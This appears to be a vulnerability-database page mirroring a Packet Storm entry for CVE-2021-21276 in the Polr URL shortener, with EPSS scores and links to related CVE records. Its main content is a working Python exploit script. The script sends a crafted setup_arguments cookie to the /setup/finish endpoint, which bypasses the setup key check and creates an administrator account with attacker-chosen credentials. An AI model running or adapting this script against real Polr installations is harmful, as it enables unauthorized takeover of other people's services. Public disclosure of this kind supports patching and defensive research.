Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormP4kl0nc4tPACKETSTORM:171743
HistoryApr 06, 2023 - 12:00 a.m.

POLR URL 2.3.0 Shortener Admin Takeover

2023-04-0600:00:00
p4kl0nc4t
packetstormsecurity.com
118
polr url 2.3.0
admin takeover
exploit
p4kl0nc4t
setup finish endpoint
cve-2021-21276
json
requests
payload

0.015 Low

EPSS

Percentile

87.1%

JSON
`# Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover  
# Date: 2021-02-01  
# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev>  
# Vendor Homepage: -  
# Software Link: https://github.com/cydrobolt/polr  
# Version: < 2.3.0  
# Tested on: Linux  
# CVE : CVE-2021-21276  
  
  
import json  
  
import requests  
  
payload = {  
'acct_username': 'admin',  
'acct_password': 'password',  
'acct_email': '[email protected]',  
'setup_auth_key': True,  
}  
  
r = requests.get('http://localhost/setup/finish',  
cookies={'setup_arguments': json.dumps(payload)})  
print(r.text)  
  
  
`

Related

cve 1
osv 1
nvd 1
cvelist 1
zdt 1
prion 1
exploitdb 1
cve
cve
CVE-2021-21276
2021-02-01 15:15:13
osv
osv
CVE-2021-21276
2021-02-01 15:15:13
nvd
nvd
CVE-2021-21276
2021-02-01 15:15:13
cvelist
cvelist
CVE-2021-21276 Privilege escalation in Polr
2021-02-01 00:00:00
zdt
zdt
POLR URL 2.3.0 - Shortener Admin Account Takeover Exploit
2023-04-06 00:00:00
prion
prion
Code injection
2021-02-01 15:15:00
exploitdb
exploitdb
POLR URL 2.3.0 - Shortener Admin Takeover
2023-04-06 00:00:00

0.015 Low

EPSS

Percentile

87.1%

JSON
Related for PACKETSTORM:171743
cve1osv1nvd1cvelist1zdt1prion1exploitdb1